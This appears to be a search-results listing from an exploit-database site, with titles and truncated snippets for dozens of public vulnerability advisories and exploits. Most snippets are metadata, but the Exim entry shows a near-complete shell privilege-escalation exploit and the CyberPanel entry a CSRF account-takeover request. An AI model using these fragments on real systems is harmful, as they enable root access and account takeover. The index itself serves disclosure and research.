41207 matches found
IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Date: 2020-01-27 Author: Lutfu Mert Ceylan Vendor Homepage: www.icewarp.com Tested on: Windows 10 Versions: 11.4.4.1 and before Vulnerable Parameter: "color" Get Method...
yahoo.com
Pentest notes for: google.com Exploit Pack Nmap 7.70 scan initiated Mon Sep 24 23:08:15 2018 as: C:\Program Files x86\Nmap\nmap.exe -sV -A -oA log/google.com google.com Nmap scan report for google.com 172.217.19.206 Host is up 0.027s latency. rDNS record for 172.217.19.206:...
10-Strike Network Inventory Explorer 8.54 - Registration Key Buffer Overflow (SEH)
10-Strike Network Inventory Explorer 8.54 - Registration Key Buffer Overflow SEH...
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.3 webvrpcs Directory Traversal RCE Vulnerability Date: 03-11-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
Microsoft Windows 10 - nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry) Pool Memory Disclosure
Microsoft Windows 10 - nt!NtQueryDirectoryFile luafv!LuafvCopyDirectoryEntry Pool Memory Disclosure / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1361 We have discovered that the nt!NtQueryDirectoryFile system call discloses portions of uninitialized pool memory to user-mode...
Vir.IT eXplorer Anti-Virus 8.5.39 - VIAGLT64.SYS Local Privilege Escalation
Vir.IT eXplorer Anti-Virus 8.5.39 - VIAGLT64.SYS Local Privilege Escalation / Exploit Title - Vir.IT eXplorer Anti-Virus Arbitrary Write Privilege Escalation Date - 1st November 2017 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.tgsoft.it Tested Version - 8.5.39 Driver...
FiberHome - Directory Traversal
FiberHome - Directory Traversal Vulnerability Summary The following advisory describes a directory traversal vulnerability found in FiberHome routers. FiberHome Technologies Group “was established in 1974. After continuous and intensive development for over 40 years, its business has been extende...
OpenText Document Sciences xPression 4.5SP1 Patch 13 - jobRunId SQL Injection
OpenText Document Sciences xPression 4.5SP1 Patch 13 - jobRunId SQL Injection Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14757 Affected Software: ================== OpenText...
CodeMeter 6.50 - Cross-Site Scripting
CodeMeter 6.50 - Cross-Site Scripting Document Title: =============== Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2074 ID: FB49498 Acknowledgements:...
Microsoft Windows - COM Aggregate MarshalerIRemUnknown2 Type Confusion Privilege Escalation
Microsoft Windows - COM Aggregate MarshalerIRemUnknown2 Type Confusion Privilege Escalation / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107 Windows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 Class:...
LightDM (Ubuntu 16.0416.10) - Guest Account Local Privilege Escalation
LightDM Ubuntu 16.0416.10 - Guest Account Local Privilege Escalation Source: https://blogs.securiteam.com/index.php/archives/3134 Vulnerability Summary The following advisory describes a local privilege escalation via LightDM found in Ubuntu versions 16.10 / 16.04 LTS. Ubuntu is an open source...
Zabbix 2.2 3.0.3 - API JSON-RPC Remote Code Execution
Zabbix 2.2 3.0.3 - API JSON-RPC Remote Code Execution !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Zabbix RCE with API JSON-RPC Date: 06-06-2016 Exploit Author: Alexander Gurin Vendor Homepage: http://www.zabbix.com Software Link: http://www.zabbix.com/download.php Version: 2.2 - 3.0.3...
Exim 4.84-3 - Local Privilege Escalation
Exim 4.84-3 - Local Privilege Escalation !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...
Yeager CMS 1.2.1 - Multiple Vulnerabilities
Yeager CMS 1.2.1 - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Vulnerabilities product: Yeager CMS vulnerable version: 1.2.1 fixed version: 1.3 CVE number: CVE-2015-7567,...
Libuser Library - Multiple Vulnerabilities
Libuser Library - Multiple Vulnerabilities Qualys Security Advisory CVE-2015-3245 userhelper chfn newline filtering CVE-2015-3246 libuser passwd file handling -- Summary ----------------------------------------------------------------- The libuser library implements a standardized interface for...
DeDeCMS 5.7-sp1 - Remote File Inclusion
DeDeCMS 5.7-sp1 - Remote File Inclusion ========================== Exploit Title: Dedecms variable coverage leads to getshell Date: 26-06-2015 Vendor Homepage: http://www.dedecms.com/ Version: dedecms 5.7-sp1 and all old version CVE : CVE-2015-4553 =========================== CVE-2015-4553Dedecms...
Drupal 7.0 7.31 - Drupalgeddon SQL Injection (Add Admin User)
Drupal 7.0 7.31 - Drupalgeddon SQL Injection Add Admin User !/usr/bin/python Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 Inspired by yukyuk's P.o.C https://www.reddit.com/user/fyukyuk Tested on Drupal 7.31 with BackBox 3.x This material is intended for...
Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities
Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities 1. Advisory Information Title: Oracle VirtualBox 3D Acceleration Multiple Memory...
Ammyy Admin 3.2 - Authentication Bypass
Ammyy Admin 3.2 - Authentication Bypass Title: ==== Ammyy Admin - Hidden hard-coded option and Access Control vulnerability. Credit: ====== Name: Bhadresh Patel Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: ==== - CVE-2013-5581 for hidden hard-coded...
DeWeS 0.4.2 - Directory Traversal
DeWeS 0.4.2 - Directory Traversal Advisory ID: HTB23167 Product: DeWeS web server Twilight CMS Vendor: Strata Technologies LLC Vulnerable Versions: 0.4.2 and probably prior Tested Version: 0.4.2 Vendor Notification: July 24, 2013 Public Disclosure: August 21, 2013 Vulnerability Type: Path Travers...
Microsoft HyperV - Persistent Denial of Service (MS11-047)
Microsoft HyperV - Persistent Denial of Service MS11-047 Core Security Technologies - Corelabs Advisory http://corelabs.coresecurity.com/ MS HyperV Persistent DoS Vulnerability 1. Advisory Information Title: MS HyperV Persistent DoS Vulnerability Advisory ID: CORE-2011-0203 Advisory URL:...
Linux Kernel 2.6.36-rc1 (Ubuntu 10.04 2.6.32) - CAN BCM Local Privilege Escalation
Linux Kernel 2.6.36-rc1 Ubuntu 10.04 2.6.32 - CAN BCM Local Privilege Escalation / i-CAN-haz-MODHARDEN.c Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 Ben Hawkes discovered an integer overflow in the Controller Area Network CAN...
Joomla! Component com_yanc - SQL Injection
Joomla! Component comyanc - SQL Injection ============================================================================== » Joomla comyanc Remote Sql Injection Vulnerability ============================================================================== » Script: Joomla » Language: PHP » Founder:...
Oracle Database 10.1.0.5 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow
Oracle Database 10.1.0.5 10.2.0.4 - AUTHSESSKEY Length Validation Remote Buffer Overflow include include include include include include void ssend SOCKET s, char msg, DWORD size int sent; printf "ssend: begin: %d bytes\n", size; sent=send s, charmsg, size, 0; if sent==SOCKETERROR printf "send -...
ViArt CMS - forum_topic_new.php?forum_id Cross-Site Scripting
ViArt CMS - forumtopicnew.php?forumid Cross-Site Scripting source: https://www.securityfocus.com/bid/36003/info ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code...
SH-News 3.0 - comments.php SQL Injection
SH-News 3.0 - comments.php SQL Injection ...:::::SH-News 3.0 SQL Injection Vulnerbility ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By : hadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all iranian hackerz greetz:to ...
YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting
YaPiG 0.9x - Thankscomment.php Cross-Site Scripting source: https://www.securityfocus.com/bid/19709/info Yapig is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may let an attacker steal cookie-based authentication credentials and...
phpLinks 2.1.2 - Multiple Vulnerabilities
phpLinks 2.1.2 - Multiple Vulnerabilities phpLinks Multiple Vulnerabilities Vendor: destiney.com Product: phpLinks Version: = 2.1.2 Website: http://phplinks.sourceforge.net/ BID: 6632 6633 Description: phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link far...
Trend Micro Maximum Security 2019 - Privilege Escalation
Trend Micro Maximum Security 2019 - Privilege Escalation Exploit Title: Trend Micro Maximum Security 2019 - Privilege Escalation Date: 2020-1-16 Exploit Author: hyp3rlinx Vendor Homepage: www.trendmicro.com Version: Platform Microsoft Windows, Premium Security 2019 v15, Maximum Security 2019 v15...
Studio 5000 Logix Designer 30.01.00 - FactoryTalk Activation Service Unquoted Service Path
Studio 5000 Logix Designer 30.01.00 - FactoryTalk Activation Service Unquoted Service Path Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Discovery by: Luis Martinez Discovery Date: 2019-11-18 Vendor Homepage:...
Optergy 2.3.0a - Remote Code Execution (Backdoor)
Optergy 2.3.0a - Remote Code Execution Backdoor Title: Optergy 2.3.0a - Remote Code Execution Author: LiquidWorm Date: 2019-11-05 Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: \n' sys.exit while True: challengeurl =...
Microsoft DirectWrite AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar
Microsoft DirectWrite AFDKO - Use of Uninitialized Memory While Freeing Resources in varloadavar -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library...
CyberPanel 1.8.4 - Cross-Site Request Forgery
CyberPanel 1.8.4 - Cross-Site Request Forgery Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...
LibreNMS 1.46 - addhost Remote Code Execution
LibreNMS 1.46 - addhost Remote Code Execution !/usr/bin/python ''' Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution Date: 24/12/2018 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2018-20434 Vendor Homepage: https://www.librenms.org/ Version: v1.46 Tested on: Ubuntu 18.04 / PHP...
Microsoft Windows 72008 - Win32k Denial of Service (PoC)
Microsoft Windows 72008 - Win32k Denial of Service PoC Exploit Title: Microsoft Windows Win32k CVE-2019-0808 Local Privilege Escalation Vulnerability Date: 24/03/2019 Exploit Author: ze0r Vendor Homepage: www.microsoft.com Version: Microsoft Windows 7/ Server 2008 CVE : CVE-2019-0808...
Linux Kernel 4.4 - rtnetlink Stack Memory Disclosure
Linux Kernel 4.4 - rtnetlink Stack Memory Disclosure / Briefs - CVE-2016-4486 has discovered and reported by Kangjie Lu. - This is local exploit against the CVE-2016-4486. Tested version - Distro : Ubuntu 16.04 - Kernel version : 4.4.0-21-generic - Arch : x8664 Prerequisites - None Goal - Leak...
Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (ldpreload Method)
Linux Kernel 4.15.x 4.19.2 - mapwrite CAPSYSADMIN Local Privilege Escalation ldpreload Method !/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47166.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses ld.so.preload technique --...
Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (cron Method)
Linux Kernel 4.15.x 4.19.2 - mapwrite CAPSYSADMIN Local Privilege Escalation cron Method !/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47164.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses crontab technique ---...
Cisco Adaptive Security Appliance - Path Traversal
Cisco Adaptive Security Appliance - Path Traversal ''' Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques. Vulnerabl...
Siemens SIMATIC S7-300 CPU - Remote Denial of Service
Siemens SIMATIC S7-300 CPU - Remote Denial of Service Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service Google Dork: inurl:/Portal/Portal.mwsl Date: 2018-05-30 Exploit Author: t4rkd3vilz Vendor Homepage: https://www.siemens.com/ Version: SIMATIC S7-300 CPU family: all versions...
Rockwell Scada System 27.011 - Cross-Site Scripting
Rockwell Scada System 27.011 - Cross-Site Scripting Exploit Title: Rockwell Scada System - Cross-Site Scripting Date: 2018-05-16 Exploit Author: t4rkd3vilz Vendor Homepage: https://rockwellautomation.com/ Software Link:...
Kentico CMS 11.0 - Buffer Overflow
Kentico CMS 11.0 - Buffer Overflow Document Title: =============== Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=1943 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5282 CVE-ID: =======...
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure Vulnerability Summary The following advisory describes sensitive information Disclosure found in Tiandy IP cameras version 5.56.17.120 Tianjin Tiandy Digital Technology Co., Ltd Tiandy Tech is “one of top 10 leading CCTV manufacture...
Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities
Sound eXchange SoX 14.4.2 - Multiple Vulnerabilities Sound eXchange SoX multiple vulnerabilities ================ Author : qflb.wu =============== Introduction: ============= SoX is a cross-platform Windows, Linux, MacOS X, etc. command line utility that can convert various formats of computer...
Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection
Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection + Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: =================...
ntfs-3g (Debian 9) - Local Privilege Escalation
ntfs-3g Debian 9 - Local Privilege Escalation !/bin/bash echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @" echo "@ ntfs-3g local privilege escalation to root @" echo "@ Credits to Google Project Zero @" echo "@ Affects: Debian 9/8/...
WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation
WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation /Functions/UpdateAdmin-Databases.php file. Remote attackers are able to request crafted data of the POST method request with the vulnerable ´accesrole´ parameter. The security risk of the privilege scalation web vulnerability ...
CuteNews 2.0.3 - Arbitrary File Upload
CuteNews 2.0.3 - Arbitrary File Upload CuteNews 2.0.3 Remote File Upload Vulnerability ================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //...
FreeBSD - Multiple Vulnerabilities
FreeBSD - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ FreeBSD Kernel Multiple Vulnerabilities 1. Advisory Information Title: FreeBSD Kernel Multiple Vulnerabilities Advisory ID: CORE-2015-0003 Advisory URL:...
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation MS14-070 """ KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-001 Publication Date:...